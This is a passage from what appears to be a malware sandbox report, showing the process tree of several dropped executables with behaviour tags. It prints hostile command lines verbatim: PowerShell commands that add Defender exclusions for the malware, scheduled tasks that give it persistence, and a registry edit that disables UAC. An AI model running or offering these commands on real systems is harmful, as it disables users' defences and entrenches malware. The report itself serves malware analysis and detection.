C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1856,11617871939886455477,965936101383774506,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2072 /prefetch:35⤵
- Suspicious behavior: EnumeratesProcesses
PID:1420
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1856,11617871939886455477,965936101383774506,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --mojo-platform-channel-handle=2392 /prefetch:85⤵
- Suspicious behavior: EnumeratesProcesses
PID:4500
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-sandbox --remote-debugging-port=9222 --field-trial-handle=1856,11617871939886455477,965936101383774506,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2952 /prefetch:15⤵
- Uses browser remote debugging
- Suspicious behavior: EnumeratesProcesses
PID:836
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-sandbox --remote-debugging-port=9222 --field-trial-handle=1856,11617871939886455477,965936101383774506,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2960 /prefetch:15⤵
- Uses browser remote debugging
- Suspicious behavior: EnumeratesProcesses
PID:4732
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-sandbox --remote-debugging-port=9222 --field-trial-handle=1856,11617871939886455477,965936101383774506,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4116 /prefetch:15⤵
- Uses browser remote debugging
- Suspicious behavior: EnumeratesProcesses
PID:3988
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-sandbox --remote-debugging-port=9222 --field-trial-handle=1856,11617871939886455477,965936101383774506,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3548 /prefetch:15⤵
- Uses browser remote debugging
- Suspicious behavior: EnumeratesProcesses
PID:4584
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-sandbox --remote-debugging-port=9222 --field-trial-handle=1856,11617871939886455477,965936101383774506,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2608 /prefetch:15⤵
- Uses browser remote debugging
- Suspicious behavior: EnumeratesProcesses
PID:4164
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-sandbox --remote-debugging-port=9222 --field-trial-handle=1856,11617871939886455477,965936101383774506,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3452 /prefetch:15⤵
- Uses browser remote debugging
- Suspicious behavior: EnumeratesProcesses
PID:4476
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1856,11617871939886455477,965936101383774506,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=4648 /prefetch:85⤵
- Suspicious behavior: EnumeratesProcesses
PID:1028
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe"C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe"2⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1468 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3812
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4788
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\WindowsDefender.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3984
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'WindowsDefender.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4632
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "WindowsDefender" /tr "C:\Users\Admin\AppData\Roaming\WindowsDefender.exe"3⤵
- Scheduled Task/Job: Scheduled Task
PID:4004
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\RunTimeBroker%20(2).exe"C:\Users\Admin\AppData\Local\Temp\Files\RunTimeBroker%20(2).exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1556
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Client-built.exe"C:\Users\Admin\AppData\Local\Temp\Files\Client-built.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:2144 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f3⤵
- Scheduled Task/Job: Scheduled Task
PID:4756
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\ApiUpdater.exe"C:\Users\Admin\AppData\Local\Temp\Files\ApiUpdater.exe"2⤵
- Adds policy Run key to start application
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:4572 -
C:\Windows\SysWOW64\cmd.exe/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f3⤵
- System Location Discovery: System Language Discovery
PID:1056 -
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f4⤵
- UAC bypass
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:1756
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\install.vbs"3⤵
- System Location Discovery: System Language Discovery
PID:900 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c "C:\ProgramData\Bitdefender\$77-Bitdefender.exe"4⤵
- System Location Discovery: System Language Discovery
PID:4936 -
C:\ProgramData\Bitdefender\$77-Bitdefender.exeC:\ProgramData\Bitdefender\$77-Bitdefender.exe5⤵
- Adds policy Run key to start application
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
PID:952 -
C:\Windows\SysWOW64\cmd.exe/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f6⤵
- System Location Discovery: System Language Discovery
PID:4616 -
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f7⤵
- UAC bypass
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:2672
-
-
-
\??\c:\program files (x86)\internet explorer\iexplore.exe"c:\program files (x86)\internet explorer\iexplore.exe"6⤵PID:2456
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Meeting-https.exe"C:\Users\Admin\AppData\Local\Temp\Files\Meeting-https.exe"2⤵
- Executes dropped EXE
PID:2092
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Autoupdate.exe"C:\Users\Admin\AppData\Local\Temp\Files\Autoupdate.exe"2⤵
- Downloads MZ/PE file
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2136
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Taskmgr.exe"C:\Users\Admin\AppData\Local\Temp\Files\Taskmgr.exe"2⤵
- Executes dropped EXE
PID:4928
-
-
C:\Users\Admin\AppData\Local\Temp\Files\svhoste.exe"C:\Users\Admin\AppData\Local\Temp\Files\svhoste.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2880 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svhoste" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Files\svhoste.exe" /rl HIGHEST /f3⤵
- Scheduled Task/Job: Scheduled Task
PID:236
-
-
C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1812 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svhoste" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:4832
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\e3ZP7lNP8G4Y.bat" "4⤵PID:1848
-
C:\Windows\system32\chcp.comchcp 650015⤵PID:3140
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost5⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2964
-
-
C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2348 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svhoste" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe" /rl HIGHEST /f6⤵
- Scheduled Task/Job: Scheduled Task
PID:4508
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VBo2KpPXUCjX.bat" "6⤵PID:3692
-
C:\Windows\system32\chcp.comchcp 650017⤵PID:1016
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost7⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:796
-
-
C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2480 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svhoste" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe" /rl HIGHEST /f8⤵
- Scheduled Task/Job: Scheduled Task
PID:3660
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\c1b8XLjpSaPw.bat" "8⤵PID:916
-
C:\Windows\system32\chcp.comchcp 650019⤵PID:5044
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost9⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4568
-
-
C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"9⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2464 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svhoste" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe" /rl HIGHEST /f10⤵
- Scheduled Task/Job: Scheduled Task
PID:1880
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FzTTlA1xe9Zn.bat" "10⤵PID:3440
-
C:\Windows\system32\chcp.comchcp 6500111⤵PID:4160
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost11⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3100
-
-
C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"11⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4568 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svhoste" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe" /rl HIGHEST /f12⤵
- Scheduled Task/Job: Scheduled Task
PID:4936
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\pXs034yBHAgl.bat" "12⤵PID:228
-
C:\Windows\system32\chcp.comchcp 6500113⤵PID:4856
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost13⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1548
-
-
C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"13⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2080 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svhoste" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe" /rl HIGHEST /f14⤵
- Scheduled Task/Job: Scheduled Task
PID:2004
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tEQJgDnwcxkJ.bat" "14⤵PID:2780
-
C:\Windows\system32\chcp.comchcp 6500115⤵PID:3644
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost15⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3292
-
-
C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"15⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3352 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svhoste" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe" /rl HIGHEST /f16⤵
- Scheduled Task/Job: Scheduled Task
PID:724
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rbE5hvCt0WHy.bat" "16⤵PID:868
-
C:\Windows\system32\chcp.comchcp 6500117⤵PID:388
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost17⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3788
-
-
C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"17⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:728 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svhoste" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe" /rl HIGHEST /f18⤵
- Scheduled Task/Job: Scheduled Task
PID:2204
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\y0DW9qJIBGmP.bat" "18⤵PID:2652
-
C:\Windows\system32\chcp.comchcp 6500119⤵PID:4288
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost19⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3476
-
-
C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"19⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1564 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svhoste" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe" /rl HIGHEST /f20⤵
- Scheduled Task/Job: Scheduled Task
PID:4276
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KGlloHmnC90k.bat" "20⤵PID:4964
-
C:\Windows\system32\chcp.comchcp 6500121⤵PID:3440
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost21⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1028
-
-
C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"21⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1500 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svhoste" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe" /rl HIGHEST /f22⤵
- Scheduled Task/Job: Scheduled Task
PID:784
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\fsI49EAIjvGZ.bat" "22⤵PID:2372
-
C:\Windows\system32\chcp.comchcp 6500123⤵PID:956
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost23⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:200
-
-
C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"23⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4192 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svhoste" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe" /rl HIGHEST /f24⤵
- Scheduled Task/Job: Scheduled Task
PID:1636
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YK9rzKh5S9AA.bat" "24⤵PID:232
-
C:\Windows\system32\chcp.comchcp 6500125⤵PID:4916
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost25⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4748
-
-
C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"25⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1960 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svhoste" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe" /rl HIGHEST /f26⤵
- Scheduled Task/Job: Scheduled Task
PID:2528
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VJrjZRKTCMzG.bat" "26⤵PID:3324
-
C:\Windows\system32\chcp.comchcp 6500127⤵PID:4160
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost27⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3164
-
-
C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"27⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2980 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svhoste" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe" /rl HIGHEST /f28⤵
- Scheduled Task/Job: Scheduled Task
PID:4484
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\3qVEI6T06gv9.bat" "28⤵PID:784
-
C:\Windows\system32\chcp.comchcp 6500129⤵PID:1040
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost29⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1272
-
-
C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"29⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4084 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svhoste" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe" /rl HIGHEST /f30⤵
- Scheduled Task/Job: Scheduled Task
PID:2732
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DZXd6DGr3rU5.bat" "30⤵PID:240
-
C:\Windows\system32\chcp.comchcp 6500131⤵PID:4236
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost31⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:956
-
-
C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"31⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3748 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svhoste" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe" /rl HIGHEST /f32⤵
- Scheduled Task/Job: Scheduled Task
PID:1136
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zJmUHiHEzuU8.bat" "32⤵PID:3972
-
C:\Windows\system32\chcp.comchcp 6500133⤵PID:2324
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost33⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2792
-
-
C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"33⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4464 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svhoste" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe" /rl HIGHEST /f34⤵
- Scheduled Task/Job: Scheduled Task
PID:4380
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1w4XDwOCMns2.bat" "34⤵PID:500
-
C:\Windows\system32\chcp.comchcp 6500135⤵PID:1932
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost35⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1912
-
-
C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"35⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1156 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svhoste" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe" /rl HIGHEST /f36⤵
- Scheduled Task/Job: Scheduled Task
PID:2300
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1Y3dR3JzNiTT.bat" "36⤵PID:4144
-
C:\Windows\system32\chcp.comchcp 6500137⤵PID:4864
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost37⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3592
-
-
C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"37⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2548 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svhoste" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe" /rl HIGHEST /f38⤵
- Scheduled Task/Job: Scheduled Task
PID:3504
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KTYHPZqAfr59.bat" "38⤵PID:3884
-
C:\Windows\system32\chcp.comchcp 6500139⤵PID:688
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost39⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4224
-
-
C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"39⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5004 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svhoste" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe" /rl HIGHEST /f40⤵
- Scheduled Task/Job: Scheduled Task
PID:1640
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\licDnlX8vXja.bat" "40⤵PID:2448
-
C:\Windows\system32\chcp.comchcp 6500141⤵PID:4980
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost41⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2524
-
-
C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"41⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4564 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svhoste" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe" /rl HIGHEST /f42⤵
- Scheduled Task/Job: Scheduled Task
PID:1448
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1mGYzEKTREss.bat" "42⤵PID:2516
-
C:\Windows\system32\chcp.comchcp 6500143⤵PID:3332
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost43⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1476
-
-
C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"43⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4500 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svhoste" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe" /rl HIGHEST /f44⤵
- Scheduled Task/Job: Scheduled Task
PID:2724
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\UnKaOGICYSpa.bat" "44⤵PID:1612
-
C:\Windows\system32\chcp.comchcp 6500145⤵PID:4100
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost45⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2188
-
-
C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"45⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3040 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svhoste" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe" /rl HIGHEST /f46⤵
- Scheduled Task/Job: Scheduled Task
PID:980
-
-
